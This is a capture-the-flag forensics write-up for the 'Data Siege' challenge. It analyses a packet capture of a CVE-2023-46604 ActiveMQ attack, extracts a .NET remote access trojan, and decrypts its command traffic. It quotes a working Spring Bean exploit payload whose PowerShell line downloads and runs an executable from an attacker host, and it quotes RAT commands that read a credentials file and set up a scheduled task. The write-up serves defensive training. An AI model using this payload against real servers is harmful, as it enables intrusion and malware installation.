2024 Cyber Apocalypse: Data Siege

Challenge Information

Attribute    Details
Event        2024 Cyber Apocalypse
Category     Forensics
Challenge    Data Siege
Difficulty   Medium

Summary

Data Siege is a complex forensics challenge involving network traffic analysis, malware extraction, and decryption. The attack exploits CVE-2023-46604 in ActiveMQ to achieve remote code execution, downloads a .NET RAT (Remote Access Trojan), and establishes encrypted command & control communication. The flag is split into three parts recovered from different artifacts.


Analysis

The attack chain:

  1. Entry Point: CVE-2023-46604 (ActiveMQ RCE) on version 5.18.2
  2. Payload Delivery: XML Spring Bean configuration with ProcessBuilder command
  3. Malware Download: PowerShell downloads aQ4caZ.exe from attacker server
  4. RAT Execution: .NET executable (EzRatClient) launches
  5. C2 Communication: Encrypted traffic on port 1234
  6. Flag Distribution:
    • Part 1: In SSH public key echo command
    • Part 2: In credentials file content
    • Part 3: In PowerShell script task name

Solution

Step 1: Identify ActiveMQ Vulnerability

Analyze capture.pcap for ActiveMQ traffic:

tshark -r capture.pcap -Y "tcp.port == 61616" | head -20

Look for the ProviderVersion field in the OpenWire handshake:

  • Version: 5.18.2
  • CVE: CVE-2023-46604 (RCE vulnerability)

Step 2: Extract Malware Payload Request

Find XML Spring Bean configuration:

tshark -r capture.pcap -Y 'http.file_data contains "ProcessBuilder"' -T fields -e http.file_data

The XML reveals:

<bean id="WHgLtpJX" class="java.lang.ProcessBuilder" init-method="start">
  <constructor-arg>
    <list>
      <value>cmd.exe</value>
      <value>/c</value>
      <value>powershell Invoke-WebRequest 'http://10.10.10.21:8000/aQ4caZ.exe' -OutFile 'C:\temp\aQ4caZ.exe'; Start-Process 'c:\temp\aQ4caZ.exe'</value>
    </list>
  </constructor-arg>
</bean>

Step 3: Extract Malware Executable

Using Wireshark:

  1. File → Export Objects → HTTP
  2. Select aQ4caZ.exe
  3. Save to disk

Verify with file command:

file aQ4caZ.exe
# Output: PE32 executable (console) Intel 80386 Mono/.Net assembly

Step 4: Analyze .NET Assembly

Using dnSpy (decompiler):

  1. Open aQ4caZ.exe
  2. Examine Program class
  3. Find Decrypt function
  4. Extract encryption key: VYAemVeO3zUDTL6N62kVA
  5. Find salt bytes: [86, 101, 114, 121, 95, 83, 51, 99, 114, 51, 116, 95, 83]

Decryption parameters:

  • Key (PBKDF2 password): VYAemVeO3zUDTL6N62kVA
  • Salt: Very_S3cr3t_S (the salt bytes above decoded as ASCII)
  • Algorithm: AES-256-CBC, with key and IV derived by PBKDF2 from the password and salt

Step 5: Extract C2 Traffic

Export port 1234 data:

tshark -r capture.pcap -T fields -e data -Y "tcp.port == 1234" > output.txt
# -e data writes each segment's payload as a hex string; decode it to text before parsing the §-framed records

Step 6: Parse Command Protocol

Each command is framed as [length]§[encrypted_data], where length is the length of the Base64 string that follows:

Example:

24§1BhuY4/niTopIBHAN6vvmQ==
gs1pJD3U5aold1QaI/LdE+huVKxpC/azbuWUTstbgrbAU9zWdG7mtO0k+T9Mr0X8OBKR254z6toIOEZjd4PACN8tD+nT2n3Pun5DAbmX31vvI+BHavd4pDHEo26YKaUw

Step 7: Decrypt C2 Commands

import base64
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
from Crypto.Util.Padding import unpad

KEY = "VYAemVeO3zUDTL6N62kVA"
# Salt bytes lifted from the decompiled binary: "Very_S3cr3t_S"
SALT = bytes([0x56, 0x65, 0x72, 0x79, 0x5f, 0x53, 0x33, 0x63, 0x72, 0x33, 0x74, 0x5f, 0x53])

def decrypt(cipher_text):
    try:
        cipher_bytes = base64.b64decode(cipher_text)
        # PBKDF2 (HMAC-SHA1, 1000 rounds, the Rfc2898DeriveBytes defaults) -> 32-byte key + 16-byte IV
        pdb = PBKDF2(KEY, SALT, 32 + 16, count=1000)
        aes_key = pdb[:32]
        aes_iv = pdb[32:48]
        cipher = AES.new(aes_key, AES.MODE_CBC, aes_iv)
        decrypted = cipher.decrypt(cipher_bytes)
        # Remove PKCS7 padding (raises ValueError if the padding is invalid)
        return unpad(decrypted, AES.block_size).decode('utf-8')
    except (ValueError, UnicodeDecodeError):
        return None

Step 8: Recover Flag Parts

Part 1: In SSH key echo command:

cmd;C:\;echo ssh-rsa AAAAB3NzaC1yc2E... HTB{REDACTED ...

Extract the HTB{ portion from the SSH key line.

Part 2: In credentials file:

cmd;C:\;type C:\Users\svc01\Documents\credentials.txt
Response: Username: svc01
Password: Passw0rdCorp5421
2nd flag part: REDACTED

Part 3: In PowerShell script task name:

upfile;C:\temp\4AcFrqA.ps1
Response: powershell.exe -encoded "..."
Register-ScheduledTask -TaskName "0r3d_1n_7h3_h34dqu4r73r5}" ...

Decode the Base64 argument passed to powershell.exe -encoded to find the task name containing the flag part.

Step 9: Combine Flag Parts

Concatenate all three parts to form the complete flag.


Key Concepts

CVE-2023-46604

  • ActiveMQ versions < 5.15.16, < 5.16.7, < 5.17.6, < 5.18.3 vulnerable
  • Remote code execution through the OpenWire protocol
  • Requires network access to the OpenWire port (61616 by default)

EzRat Protocol

  • Custom TCP protocol on port 1234
  • Command format: [length]§[encrypted_command]
  • Response format: Base64-encoded, AES-encrypted data
  • File transfer support with separate handling

AES Decryption with PBKDF2

  • Key derivation: PBKDF2(password, salt, count=1000)
  • Produces 48 bytes: 32-byte key + 16-byte IV
  • AES-256-CBC mode

Investigation Checklist

  • Identify ActiveMQ version in PCAP
  • Search for CVE-2023-46604 in traffic
  • Extract Spring Bean XML configuration
  • Locate executable download URL
  • Export malware from HTTP objects
  • Analyze .NET binary with decompiler
  • Extract encryption parameters
  • Export port 1234 traffic
  • Parse command protocol format
  • Decrypt each C2 communication
  • Extract flag parts from responses
  • Combine parts for final flag

Key Takeaways

  • Network traffic analysis reveals attack progression
  • PCAP export of executables enables offline analysis
  • .NET binaries reveal cryptographic parameters when decompiled
  • Custom protocols require understanding command structure
  • AES decryption parameters must be extracted from malware
  • Multi-part flags require correlation across multiple data sources
  • C2 beacons communicate through encrypted channels
  • File transfer capabilities can exfiltrate sensitive data